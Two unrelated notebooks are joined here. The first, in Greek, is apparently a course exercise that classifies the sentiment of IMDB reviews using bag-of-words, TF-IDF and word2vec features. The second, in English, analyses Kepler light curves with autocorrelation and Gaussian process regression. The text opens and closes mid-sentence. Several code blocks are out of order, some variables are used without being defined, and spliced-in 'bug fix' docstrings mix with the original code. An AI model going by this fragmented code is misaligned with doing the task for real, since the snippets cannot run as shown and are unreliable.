βασίζεται στις πιθανότητες εμφάνισης των γραμάτων διορθώνει την λέξη qet σε set. <h2><center> Μέρος 2: Χρήση σημασιολογικών αναπαραστάσεων για ανάλυση συναισθήματος</center></h2> Στο πρώτο μέρος της άσκησης ασχοληθήκαμε κυρίως με συντακτικά μοντέλα για την κατασκευή ενός ορθογράφου. 
Εδώ θα ασχοληθούμε με τη __χρήση λεξικών αναπαραστάσεων για την κατασκευή ενός ταξινομητή συναισθήματος__ . Ως δεδομένα θα χρησιμοποιήσουμε σχόλια για ταινίες από την ιστοσελίδα IMDB και θα τα ταξινομήσουμε σε θετικά και αρνητικά ως προς το συναίσθημα. ### Βήμα 16: Δεδομένα και προεπεξεργασία __α)__ Αρχικά κατεβάζουμε τα δεδομένα που θα χρησιμοποιήσουμε. Επειδή το αρχείο είναι μεγάλο η εντολή είναι σε σχόλιο σε περίπτωση που υπάρχει ήδη κατεβασμένο. ``` # ! wget -N http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz ``` Στη συνέχεια το αποσυμπιέζουμε το αρχείου που κατεβάσαμε στον ίδιο φάκελο με το όνομα __aclImdb__. ``` # ! tar -zxf aclImdb_v1.tar.gz ``` Οι φάκελοι που μας ενδιαφέρουν είναι οι εξής: - __train__ που περιέχει όλες τις κριτικές που θα χρησιμοπιήσουμε για την εκπαίδευση του μοντέλου μας και χωρίζεται σε: - __train/pos__ το οποίο περιέχει αυτές που έχουν χαρακτηριστεί ως θετικές και - __train/neg__ το οποίο περιέχει αυτές που έχουν χαρακτηριστεί ως αρνητικές. - __test__ που περιέχει όλες τις κριτικές που θα χρησιμοποιήσουμε για να ελέγξουμε την επίδοση του μοντέλου μας και αντίστοιχα χωρίζεται σε: - __test/pos__ με τις θετικές και - __test/neg__ με τις αρνητικές. __β)__ Στη συνέχεια πρέπει να διαβάσουμε και να προεπεξεργαστούμε τα δεδομένα μας. Ο κώδικας ανάγνωσης και κάποιες απλές συναρτήσεις προεπεξεργασίας (τα οποία μας δώθηκαν έτοιμα για διευκόλυνση) παρουσιάζονται παρακάτω. - Αρχικά κάνουμε όλα τα απαραίτητα import. ``` import random import os import numpy as np import re try: import glob2 as glob except ImportError: import glob ``` - Στη συνέχεια δηλώνουμε τα path των αρχείων που θα μας φανούνε χρήσιμα και κάποιες ακόμη μεταβλητές. 
# Useful paths
data_dir = './aclImdb/'
train_dir = os.path.join(data_dir, 'train')
test_dir = os.path.join(data_dir, 'test')
pos_train_dir = os.path.join(train_dir, 'pos')
neg_train_dir = os.path.join(train_dir, 'neg')
pos_test_dir = os.path.join(test_dir, 'pos')
neg_test_dir = os.path.join(test_dir, 'neg')

# For memory limitations. These parameters fit in 8GB of RAM.
# If you have 16G of RAM you can experiment with the full dataset / W2V
MAX_NUM_SAMPLES = 5000

# Load first 1M word embeddings. This works because GoogleNews are roughly
# sorted from most frequent to least frequent.
# It may yield much worse results for other embeddings corpora
NUM_W2V_TO_LOAD = 1000000

# Fix numpy random seed for reproducibility
SEED = 42
np.random.seed(SEED)


def strip_punctuation(s):
    """Replace every character of *s* that is not a latin letter or whitespace with a space."""
    return re.sub(r'[^a-zA-Z\s]', ' ', s)


def preprocess(s):
    """Lowercase *s*, drop punctuation and collapse runs of whitespace to a single space."""
    # Fix: the pattern must be a raw string (r'\s+'); the original '\s+'
    # relied on an invalid escape sequence, which is a SyntaxWarning on
    # modern Python and inconsistent with strip_punctuation above.
    return re.sub(r'\s+', ' ', strip_punctuation(s).lower())


def tokenize(s):
    """Split *s* on single spaces and return the resulting list of tokens."""
    return s.split(' ')


def preproc_tok(s):
    """Return the lowercased, punctuation-free tokens of *s* (preprocess + tokenize)."""
    return tokenize(preprocess(s))
def read_samples(folder, preprocess=lambda x: x):
    """Read up to MAX_NUM_SAMPLES .txt reviews from *folder*.

    Each review file stores its text on a single line; *preprocess* is
    applied to that line and the results are collected into a list.
    """
    # Get all the .txt files that the folder contains
    samples = glob.iglob(os.path.join(folder, '*.txt'))
    data = []
    for i, sample in enumerate(samples):
        if MAX_NUM_SAMPLES > 0 and i == MAX_NUM_SAMPLES:
            break
        # Every review lives on the first (and only) line of its file;
        # readline() avoids materialising the whole file as a list and,
        # unlike the original `[...][0]`, does not raise on an empty file.
        with open(sample, 'r') as fd:
            data.append(preprocess(fd.readline()))
    return data


def create_corpus(pos, neg):
    """Merge positive and negative reviews into one shuffled corpus.

    Returns (corpus, y) where corpus is the reviews in random order and
    y holds the matching labels (1 = positive, 0 = negative).

    Bug fix: the original computed and shuffled `indices` but never
    applied them, so the corpus came back ordered [all pos, all neg]
    despite the documented promise of a random order.  The permutation
    is now actually applied to both the reviews and the labels.
    """
    corpus = np.array(pos + neg)
    y = np.array([1 for _ in pos] + [0 for _ in neg])
    indices = np.arange(y.shape[0])
    np.random.shuffle(indices)
    # Apply the shuffled permutation (previously computed but unused).
    return list(corpus[indices]), list(y[indices])
``` X_train_raw, Y_train = create_corpus(read_samples(pos_train_dir), read_samples(neg_train_dir)) X_test_raw, Y_test = create_corpus(read_samples(pos_test_dir), read_samples(neg_test_dir)) ``` Μπορούμε να ελέγξουμε την 1η κριτική του training set και το αντιστοιχο label της για να δούμε ότι όλα πήγαν καλά. ``` print(X_train_raw[0]) print("Postive" if Y_train[0] else "Negative") ``` ### Βήμα 17: Κατασκευή BOW αναπαραστάσεων και ταξινόμηση Η πιο βασική αναπαράσταση για μια πρόταση είναι η χρήση __Bag of Words__. Σε αυτή την αναπαράσταση μια λέξη κωδικοποιείται σαν ένα one hot encoding πάνω στο λεξιλόγιο και μια πρόταση σαν το άθροισμα αυτών των encodings. Για παράδειγμα στο λεξιλόγιο [cat, dog, eat] η αναπαράσταση της λέξης cat είναι [1, 0,0], της λέξης dog [0, 1, 0] κοκ. Η αναπαράσταση της πρότασης dog eat dog είναι [0, 2, 1]. Επιπλέον μπορούμε να πάρουμε σταθμισμένο άθροισμα των one hot word encodings για την αναπαράσταση μιας πρότασης με βάρη TF-IDF (https://en.wikipedia.org/wiki/Tf–idf). __α)__ Στην __Bag of Words__ αναπαράσταση υπολογίζουμε απλά πόσες φορές υπάρχει η κάθε λέξη στην κάθε κριτική. Έτσι, προκύπτει για κάθε κριτική ένας μεγάλος και αραιός πίνακας (με μήκος ίσο με το μέγεθος του λεξικου) που σε κάθε θέση του έχει τις φορές που παρουσιάζεται η κάθε λέξη στην κριτική. Αυτή η αναπαράσταση έχει δύο σημαντικά μειονεκτήματα τα οποία αντιμετωπίζονται με την προσθήκη βαρών __TF_IDF__. Συγκεκριμένα έχουμε ότι: - Πρέπει να λαμβάνουμε υπόψιν και το μέγεθος της κάθε κριτικής γιατί άλλη βαρύτητα έχει η ύπαρξη μιας λέξης σε μία κριτική με μικρό μέγεθος και άλλη σε μία με μεγάλο. Γι' αυτό και στον πρώτο όρο της TF_IDF που είναι το __term frequency__ αφού υπολογίσουμε πόσες φορές υπάρχει μία λέξη στην κριτική, μετά διαιρούμε με τον συνολικό μέγεθος της κριτικής. - Λέξεις οι οποίες είναι συνηθισμένες λαμβάνουν μεγάλο score σε κάθε κριτική χωρίς να πρέπει. Το νόημα είναι ότι οι σπάνιες λέξεις μας δίνουν περισσότερη πληροφορία από τις συνηθισμένες. 
Έτσι, ο δεύτερος όρος που είναι το __inverse document frequency__ είναι ο συνολικός αριθμός των κριτικών διαιρεμένος από τον αριθμό των κριτικών στις οποίες βρίσκεται η λέξη μας, με αποτέλεσμα ο όρος αυτός να αυξάνεται όσο πιο σπάνια είναι η λέξη. __β)__ Τώρα θα χρησιμοποιήσουμε τον transformer CountVectorizer του sklearn για να εξάγουμε __μη σταθμισμένες BOW αναπαραστάσεις__. ``` from sklearn.feature_extraction.text import CountVectorizer # Define the vectorizer using our preprocess and tokenize function. vectorizer = CountVectorizer(analyzer = preproc_tok) # Get training data X_train. X_train = vectorizer.fit_transform(X_train_raw) # Get test data X_test. X_test = vectorizer.transform(X_test_raw) ``` __γ)__ Σε αυτό το στάδιο έχουμε τους πίνακες με τα training και τα test data και τα αντίστοιχα labels. Οπότε μπορούμε να εφαρμόσουμε τον ταξινομητή Linear Regression του sklearn για να ταξινομήσουμε τα σχόλια σε θετικά και αρνητικά. ``` from sklearn.linear_model import LogisticRegression from sklearn.metrics import zero_one_loss # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` __δ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία χρησιμοποιώντας τον TfidfVectorizer για την εξαγώγη TF-IDF αναπαραστάσεων. ``` from sklearn.feature_extraction.text import TfidfVectorizer tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_train = tfidf_vectorizer.fit_transform(X_train_raw) X_test = tfidf_vectorizer.transform(X_test_raw) # Define the clasifier clf_tfidf = LogisticRegression() # Train the model clf_tfidf.fit(X_train, Y_train) # Compute error on training data. 
print("Training error =", zero_one_loss(Y_train, clf_tfidf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf_tfidf.predict(X_test))) ``` #### Σύγκριση αποτελεσμάτων: Παρατηρούμε ότι το test error μειώνεται κατά 1% περίπου όταν χρησιμοποιούμε βάρη TF-IDF για την αναπαράσταση μιας πρότασης. Το αποτέλεσμα αυτό ήταν αναμενόμενο γιατί όπως ειπώθηκε στο α) η αναπαράσταση αυτή καλύπτει κάποια κενά που είχε η μη σταθμισμένη BOW αναπαράσταση. ### Βήμα 18: Χρήση Word2Vec αναπαραστάσεων για ταξινόμηση Ένας άλλος τρόπος για να αναπαραστήσουμε λέξεις και προτάσεις είναι να κάνουμε χρήση προεκπαιδευμένων embeddings. Σε αυτό το βήμα θα εστιάσουμε στα word2vec embeddings. Αυτά τα embeddings προκύπτουν από ένα νευρωνικό δίκτυο με ένα layer το οποίο καλείται να προβλέψει μια λέξη με βάση το context της (παράθυρο 3-5 λέξεων γύρω από αυτή). Αυτό ονομάζεται CBOW μοντέλο. Εναλλακτικά το δίκτυο καλείται να προβλέψει το context με βάση τη λέξη (skip-gram μοντέλο). Τα word2vec vectors είναι πυκνές (dense) αναπαραστάσεις σε λιγότερες διαστάσεις από τις BOW και κωδικοποιούν σημασιολογικά χαρακτηριστικά μιας λέξης με βάση την υπόθεση ότι λέξεις με παρόμοιο νόημα εμφανίζονται σε παρόμοια συγκείμενα (contexts). Μια πρόταση μπορεί να αναπαρασταθεί ως ο μέσος όρος των w2v διανυσμάτων κάθε λέξης που περιέχει (Neural Bag of Words). Αρχικά θα επαναλάβουμε τα βήματα 9α, 9β της προπαρασκευής γιατί θα μας χρειαστούν για τα δύο πρώτα ερωτήματα. - Διαβάζουμε το βιβλίο War of the Worlds που είχαμε κατεβάσει για το μέρος Α σε μία λίστα από tokenized προτάσεις. ``` import nltk # We split the corpus in a list of tokenized sentences. 
# Convert to numpy 2d array (n_vocab x vector_size)
def to_embeddings_Matrix(model):
    """Return (matrix, index2word): row i of *matrix* is the embedding of index2word[i]."""
    vocab_size = len(model.wv.vocab)
    words = model.wv.index2word
    matrix = np.zeros((vocab_size, model.vector_size))
    # Fill one row per vocabulary entry, in index2word order.
    for row in range(vocab_size):
        matrix[row] = model.wv[words[row]]
    return matrix, words
``` X_train_raw, Y_train = create_corpus(read_samples(pos_train_dir), read_samples(neg_train_dir)) X_test_raw, Y_test = create_corpus(read_samples(pos_test_dir), read_samples(neg_test_dir)) ``` Στη συνέχεια, για κάθε κριτική υπολογίζουμε το neural bag of words, που ορίζεται ως ο μέσος όρος των w2v διανυσμάτων κάθε λέξης που περιέχει. ``` # Initialize training set X_train = np.zeros((len(X_train_raw), 100)) for row, sample in enumerate(X_train_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in myModel.wv: X_train[row] += myModel.wv[tok] words_included += 1 # Get the mean value X_train[row] = X_train[row]/words_included # Initialize test set X_test = np.zeros((len(X_test_raw), 100)) for row, sample in enumerate(X_test_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in myModel.wv: X_test[row] += myModel.wv[tok] words_included += 1 # Get the mean value X_test[row] = X_test[row]/words_included # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` Και τα δύο error είναι πάρα πολύ υψηλά με αποτέλεσμα το μοντέλο μας να έχει πάρα πολύ χαμηλή απόδοση. Η εξήγηση για αυτό είναι ότι έχουμε κατασκευάσει τα word embeddings με βάση ένα πάρα πολύ μικρό corpus το οποίο και έχει μικρό λεξικό (με αποτέλεσμα πολλές λέξεις να μην έχουν αναπαράσταση) και δεν βοηθάει στο να δημιουργηθούν παρόμοιες αναπαραστάσεις για κοντινά σημασιολογικά λέξεις (αυτό το παρατηρήσαμε και στην προπαρασκευή όταν είδαμε τις κοντινές σημασιολογικά λέξεις 10 τυχαίων λέξεν). 
__γ, δ)__ Κατεβάζουμε το προεκπαιδευμένα GoogleNews vectors, τα φορτώνουμε με το gensim και εξάγουμε αναπαραστάσεις με βάση αυτά. ``` from gensim.models import KeyedVectors googleModel = KeyedVectors.load_word2vec_format('./GoogleNews-vectors-negative300.bin',binary=True, limit=NUM_W2V_TO_LOAD) ``` Επαναλαμβάνουμε το ερώτημα 9γ της προπαρασκευής για να το συγκρίνουμε με τα GoogleNews. ``` selected_words = random.sample(voc, 10) for word in selected_words: # get most similar words sim = myModel.wv.most_similar(word, topn=5) print('"' + word + '"' + " is similar with the following words:") for s in sim: print('"' + s[0] + '"' + " with similarity " + str(s[1])) print() for word in selected_words: # get most similar words sim = googleModel.most_similar(word, topn=5) print('"' + word + '"' + " is similar with the following words:") for s in sim: print('"' + s[0] + '"' + " with similarity " + str(s[1])) print() ``` Αυτό που παρατηρούμε είναι ότι προφανώς με τα Google Vectors τα αποτελέσματα είναι εντυπωσικά αφού όλες οι κοντινές λέξεις είναι και στην πραγματικότητα πολύ κοντινές. Από την άλλη, το δικό μας μοντέλο έχει πολύ χαμηλές επιδόσεις που οφείλεται στο γεγονός ότι τα embeddings προέκυψαν από πολύ μικρό corpus. Τα Google Vectors από την άλλη έχουν ένα τεράστιο corpus από πίσω με αποτέλεσμα και να έχει τεράστιο λεξικό αλλά και οι σημασιολογικά κοντινές λέξεις να έχει και παρόμοια αναπαράσταση. __ε)__ Αντίστοιχα με το myModel τώρα θα εκπαιδεύσουμε ένα Logistic Regression ταξινομητή με το μοντέλο που προέκυψε από τα Google Vectors. ``` # Initialize training set X_train = np.zeros((len(X_train_raw), 300)) for row, sample in enumerate(X_train_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. 
if tok in googleModel: X_train[row] += googleModel[tok] words_included += 1 # Get the mean value X_train[row] = X_train[row]/words_included # Initialize test set X_test = np.zeros((len(X_test_raw), 300)) for row, sample in enumerate(X_test_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel: X_test[row] += googleModel[tok] words_included += 1 # Get the mean value X_test[row] = X_test[row]/words_included # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` Όπως ήταν αναμενόμενο το error μειώθηκε κατά πολύ καθώς τώρα τα embeddings ήταν καλύτερα. Σε σύγκριση με το TF_IDF το error εδώ είναι λίγο μεγαλύτερο αλλά κερδίζουμε πολύ σε χώρο και χρόνο καθώς οι πίνακες με τα training και test data είναι πολύ πιο μικροί και πυκνοί. __στ)__ Τώρα θα δημιουργήσουμε αναπαραστάσεις των κριτικών με χρήση σταθμισμένου μέσου των w2v αναπαραστάσεων των λέξεων. Ως βάρη θα χρησιμοποιήσουμε τα TF-IDF βάρη των λέξεων. ``` # Get the vocabulary of the words in the training set # that contains their tf-idf value. tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_train_temp = tfidf_vectorizer.fit_transform(X_train_raw) voc = tfidf_vectorizer.vocabulary_ # Do the same as before but now, we multiply each represantation by a the tf-idf of the word. # Initialize training set X_train = np.zeros((len(X_train_raw), 300)) for row, sample in enumerate(X_train_raw): # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. 
if tok in googleModel and tok in voc: X_train[row] += googleModel[tok] * X_train_temp[row,voc[tok]] # Get the vocabulary of the words in the training set # that contains their tf-idf value. tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_test_temp = tfidf_vectorizer.fit_transform(X_test_raw) voc = tfidf_vectorizer.vocabulary_ # Do the same as before but now, we multiply each represantation by a the tf-idf of the word. # Initialize test set X_test = np.zeros((len(X_test_raw), 300)) for row, sample in enumerate(X_test_raw): # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel and tok in voc: X_test[row] += googleModel[tok] * X_test_temp[row,voc[tok]] ``` __ζ)__ Επαναλαμβάνουμε την ταξινόμηση με τις νέες αναπαραστάσεις. ``` # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ```
github_jupyter
# Time Series approach ### Methods to be used: - Auto Correlation Function - Smoothing via handcrafted Gaussian Kernel - Gaussian Process Regression - Cross Validation - Lomb Scargle (Fast and Generalized) - Wavelets ``` import os import sys import numpy as np import scipy import pandas as pd import pywt import matplotlib.pyplot as plt # Fro pretty printing import pprint # For lag plot from pandas.plotting import lag_plot # For ACF import statsmodels from statsmodels.tsa.stattools import acf # For zoom-in inside the plot box from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes from mpl_toolkits.axes_grid1.inset_locator import mark_inset # Gridspec import matplotlib.gridspec as gridspec # Vaex for lightweight plotting import vaex as vx # Gaussian Process from sklearn.gaussian_process import GaussianProcessRegressor from sklearn.gaussian_process.kernels import (RBF, Matern, RationalQuadratic, ExpSineSquared, DotProduct, ConstantKernel, WhiteKernel) # Cross validation from sklearn.model_selection import GridSearchCV %matplotlib notebook try: import gatspy except: !{sys.executable} -m pip install gatspy --user # !conda install --yes --prefix {sys.prefix} gatspy ``` ### Importing data, using Kepler light curves Import a random Kepler light curve. Time is in days, flux is a relative scale. 
``` data_list = ['DataV_koi_kplr005706966.csv', 'DataV_koi_kplr003348082.csv', 'DataV_koi_kplr003656121.csv', 'DataV_koi_kplr004135665.csv', 'DataV_koi_kplr002302548.csv', 'DataV_koi_kplr006846911.csv', 'DataV_koi_kplr006948054.csv', 'DataV_koi_kplr008030339.csv', 'DataV_koi_kplr008884274.csv', 'DataV_koi_kplr009150870.csv', 'DataV_koi_kplr009153554.csv', 'DataV_koi_kplr011442793.csv',] fname = os.path.join('lc_data', data_list[0]) lc_x = pd.read_csv(fname, names=['time', 'flux', 'e_flux'], nrows=15000, engine='python') npt_lsst = np.ceil(np.ptp(lc_x.time.values) / 1.6).astype('int') lc_x2 = lc_x[::npt_lsst] lc_x2.reset_index(drop=True, inplace=True) ``` Getting the sampling rate (cadence), we will need it after to scale measurements to day scales ``` cad1 = np.median(np.ediff1d(lc_x['time'].values)) cad2 = np.median(np.ediff1d(lc_x2['time'].values)) print('Kepler sampling: {0:.2f} d, LSST-like sampling:{1:.2f} d'.format(cad1, cad2)) ``` Quick visualization, both Kepler sample-like and LSST sample-like (best scenario) ``` fig, ax = plt.subplots(figsize=(6, 4)) ax.scatter(lc_x.time, lc_x.flux, marker='o', s=5, c=lc_x.e_flux, cmap='jet') ax.scatter(lc_x2.time, lc_x2.flux, marker='.', s=50, c='lime', edgecolor='k', lw=0.5) ax.set_xlabel('time d') ax.set_ylabel(r'flux$_{normalized}$') ax.set_ylim([np.min(lc_x.flux) - np.std(lc_x.flux), np.max(lc_x.flux) + np.std(lc_x.flux)]) ax.set_title('Same LC with different cadences', color='navy') ``` ### Import light curves into vaex ``` # Whole set ds_all = vx.from_ascii(fname, seperator=",", names=['time', 'flux', 'e_flux']) ds_K = vx.from_pandas(lc_x, name='kplr') ds_L = vx.from_pandas(lc_x2, name='lsst') fig, ax = plt.subplots(1, 2, figsize=(10, 4)) # Set first subplot as active plt.sca(ax[0]) ds_all.scatter('time', 'flux', c='k', alpha=0.6, s=0.1, length_limit=len(ds_all)) delta_yr = np.ptp(ds_all.minmax('time')) / 365 ax[0].set_title(r'Whole LC, $\Delta$={0:.2f} yr'.format(delta_yr)) ax[0].axvline(ds_K.max('time'), 
color='yellowgreen', lw=2) # Now second plot plt.sca(ax[1]) ds_K.scatter('time', 'flux', c='dodgerblue', alpha=0.6, s=1) ds_L.scatter('time', 'flux', c='orange', alpha=1, s=20, edgecolor='k') delta_yr = np.ptp(ds_K.minmax('time')) / 365 ax[1].set_title(r'Subsection of $\Delta$={0:.2f} yr'.format(delta_yr), color='navy') print(ds_K.minmax('time')) ``` Quick checking: lag plot should be random for structures with no memory. The correlation here is a sanity check **This relates to... memory of the system!** ``` plt.close('all') fig, ax = plt.subplots(1, 2, figsize=(6, 3)) lag1 = lag_plot(lc_x.flux, ax=ax[0], marker='.', c='goldenrod', edgecolor='k', lw=0.1) lag2 = lag_plot(lc_x2.flux, ax=ax[1], marker='.', c='dodgerblue', edgecolor='k', lw=0.1) # for sub in ax: sub.set_aspect('equal') ax[0].set_title('Kepler sampling') ax[1].set_title('LSST-like sampling') plt.subplots_adjust(wspace=0.55) ``` ## Autocorrelation Function It is safe to only look for periods shorter than half the light curve, $k \leq \frac{N}{2}$ Calculate the autocorrelation coefficients via statsmodels. Note that the `tsa.stattools.acf` method receives only the flux, thus assuming the spacing between each observation is uniform. 
def gaussian(mu, sigma, x):
    """Normalized Gaussian PDF with mean *mu* and std *sigma*, evaluated at *x* (scalar or array).

    Bug fix: the original wrote np.power(-(x - mu), 2), i.e. it squared
    the *negated* difference, giving exp(+(x-mu)^2 / (2*sigma^2)) — a
    growing exponential instead of a bell curve.  The minus sign must
    apply to the squared term, outside the square, so the smoothing
    kernel built from this function actually decays away from *mu*.
    """
    coeff = 1.0 / (sigma * np.sqrt(2 * np.pi))
    return coeff * np.exp(-np.power(x - mu, 2) / (2 * np.power(sigma, 2)))
A suggestion from literature (McQuillan + 2013): ``` sigma_x = 18 / 2.35 x = np.arange(0, 56, 1) ``` ``` sigma_x = 18 / 2.35 x = np.arange(0, 56, 1) acf_g_conv = scipy.signal.convolve(acf_coeffs, gaussian(0, sigma_x, x)) / np.sum(gaussian(0, sigma_x, x)) print('Original size of the ACF coefficients array: {0}. The smoothed: {1}'.format(acf_coeffs.size, acf_g_conv.size)) # Trim the padded extra section, and re-use the previously defined inteval tau_k Ntrim = acf_g_conv.size - acf_coeffs.size acf_g_conv = acf_g_conv[Ntrim:] # Local maxima aux_maxima = scipy.signal.argrelextrema(acf_g_conv, np.greater) # Global maxima idx_gmax = np.argmax(acf_g_conv[aux_maxima]) # Grid fig = plt.figure(figsize=(5, 4)) gs1 = gridspec.GridSpec(3, 3) gs1.update(left=0.16, right=0.98, hspace=0.05) ax0 = fig.add_subplot(gs1[: -1, :]) ax1 = fig.add_subplot(gs1[-1, :], sharex=ax0) # ax1.scatter(t_d, acf_g_conv - acf_coeffs, marker='*', s=10, color='orange') # ax0.scatter(t_d, acf_g_conv, marker='.', s=10, color='lightgray') ax0.scatter(t_d[aux_maxima], acf_g_conv[aux_maxima], marker='^', s=20, color='lime', edgecolor='k', linewidths=0.1) # ax0.axvline(t_d[aux_maxima][idx_gmax], lw=2, c='b', alpha=0.5) # ax0.set_ylabel(r'$\rho$', fontsize=13) ax1.set_xlabel(r'time $d$', fontsize=13) ax1.set_ylabel(r'Gauss - ACF', fontsize=13) max_acf_kplr = t_d[aux_maxima][np.argmax(acf_g_conv[aux_maxima])] print('Maximum of the ACF: {0:.2f} d'.format(max_acf_kplr)) ``` ### Let's do the same for the more sparse situation... ``` acf_coeffs_spa = acf(lc_x2.flux.values, unbiased=False, nlags=len(lc_x2.flux.values) // 2) tau_k_spa = np.arange(1, acf_coeffs_spa.size + 1, 1) t_d_spa = cad2 * tau_k_spa ``` We must remember that so far we are assuming an uniform sampling . In the case of Kepler cadence, given the amount of points, for this analysis this is not a concern. In the case of a more sparse time series, changes in the cadence will make us result not be as accurate as if having a regular cadence. 
``` fig, ax = plt.subplots(1, 2, figsize=(8, 4)) ax[0].scatter(t_d, acf_coeffs, alpha=0.5, label='ACF for Kepler sampling', c='navy', s=10) ax[0].scatter(t_d_spa, acf_coeffs_spa, label='ACF for downsampled data', c='orange', s=20) # Histogram of the cadence in the data ax[1].hist(np.ediff1d(lc_x2['time'].values), bins=10, histtype='stepfilled', color=['lemonchiffon'], lw=0) ax[1].hist(np.ediff1d(lc_x2['time'].values), bins=10, histtype='step', color=['orange'], lw=2) # ax[0].legend(loc='upper right') ax[0].set_xlabel(r'time $d$', fontsize=13) ax[0].set_ylabel(r'$\rho$', fontsize=13) ax[1].set_xlabel(r'$x_{(t+1)}-x_{t}$ $d$', fontsize=13) ax[1].set_ylabel('N') ax[0].set_title('ACF for both cadences', color='forestgreen') ax[1].set_title('Histogram of cadence, sparse LC', color='navy') # plt.subplots_adjust(bottom=0.2) # Local maxima aux_maxima_spa = scipy.signal.argrelextrema(acf_coeffs_spa, np.greater) # Global maxima idx_gmax = np.argmax(acf_coeffs_spa[aux_maxima_spa]) max_acf_lsst = t_d_spa[aux_maxima_spa][np.argmax(acf_coeffs_spa[aux_maxima_spa])] txt = 'Maximum of the ACF, for sparse scenario: {0:.2f} d, this represents a variation'.format(max_acf_lsst) txt += ' of {0:.2f}% respect to Kepler-sampling'.format(max_acf_lsst * 100 / max_acf_kplr - 100) print(txt) ``` A variation of 17% maybe is within our scientific expectatins, maybe not. Let's try a method to fill gaps, for the case when we miss some observatins, or need more points. Note that a previous knowledge of the expected behaviour increases our chances of get a more accurate prediction. ### Gap filling Fillig the gaps will allow us to have a more regular sampled grid. In the case when fewer observations are available, compared with the main variability length, to have an uniform sampling makes calculations more stable. **Important**: *chains of N >= 4000 and long runs, make your regression more robust. 
Let it run long enough!* ``` # Instance of the GP guess_period = max_acf_kplr # length_scale: while larger, the shapes of the samples elongate. Default:1. # length_scale_bounds: lower and upper bounds for lenght_scale. Let's say is a day # periodicity_bounds: lower and upper bounds in periodicity if 0: kernel = 1.0 * ExpSineSquared(length_scale=guess_period/2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period), ) else: # Exponential Sine expsine= 1. * ExpSineSquared(length_scale=guess_period / 2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period),) # Radial Basis Function rbf = 1.0 * RBF(length_scale=2 * guess_period, length_scale_bounds=(0.1 * guess_period, 4.0 * guess_period)) # Rational Quadratic rquad = 1. * RationalQuadratic(length_scale=np.ptp(lc_x2.time.values) / 10, alpha=1) # Matern (unstable in this scenario) matern = .5 * Matern(length_scale= 2 * guess_period, length_scale_bounds=(0.5 * guess_period, 10 *guess_period), nu=1.5) kernel = expsine + rbf # If want to replicate the result, must use same seed aux_seed = np.random # 45 gp = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=50, random_state=aux_seed) if 1: # Calculate the prior x_prior = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000) y_mean_prior, y_std_prior = gp.predict(x_prior[:, np.newaxis], return_std=True) y_samples_prior = gp.sample_y(x_prior[:, np.newaxis], 1000) # Fit to data using Maximum Likelihood Estimation of the parameters gp.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Posterior x_grid = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000) # Make the prediction on the meshed x-axis (ask for MSE as well) y_mean_post, y_std_post = gp.predict(x_grid[:, np.newaxis], return_std=True) y_samples_post = gp.sample_y(x_grid[:, np.newaxis], 5000) fig, ax = plt.subplots(1, 
figsize=(8, 4)) # Vaex for the Kepler sampling ds_K.scatter('time', 'flux', label='Kepler sampling (N={0})'.format(len(ds_K)), c='navy', alpha=0.1, s=10) # Posterior <x> ax.plot(x_grid, y_mean_post, lw=2, c='lime', label='Mean of posterior distribution') # Initial data points ax.plot(lc_x2.time, lc_x2.flux, 'o', c='w', label='LSST-like data points (N={0})'.format(len(lc_x2.index)), markersize=4, markeredgecolor='k') # ax.set_title('Gaussian Process Regression result. From 15000 to 72 data points', color='navy') ax.set_xlabel(r'time $d$', fontsize=13) ax.set_ylabel(r'flux$_{normalized}$', fontsize=13) plt.tight_layout() ax.set_facecolor('floralwhite') ax.legend(loc='upper left') t = 'Posterior\n{0}\nkernel = {1}'.format('=' * len('Posterior'),gp.kernel_) t += '\nLog-likelohood ={0:.3f}'.format(gp.log_marginal_likelihood(gp.kernel_.theta)) print(t) ``` **Note through the iterations the periodicity value was changed.** ``` if False: import pickle pickle.dump(y_mean_post, open('y_mean_posterior_lsst.pickle', 'wb')) np.save('y_mean_posterior.npy', y_mean_post) ``` ## Cross Validation Note we trained the Gaussian Process and tested/applied it on the same dataset. In this scenario the model would probably fail to predict unknown data. Then, we should have different 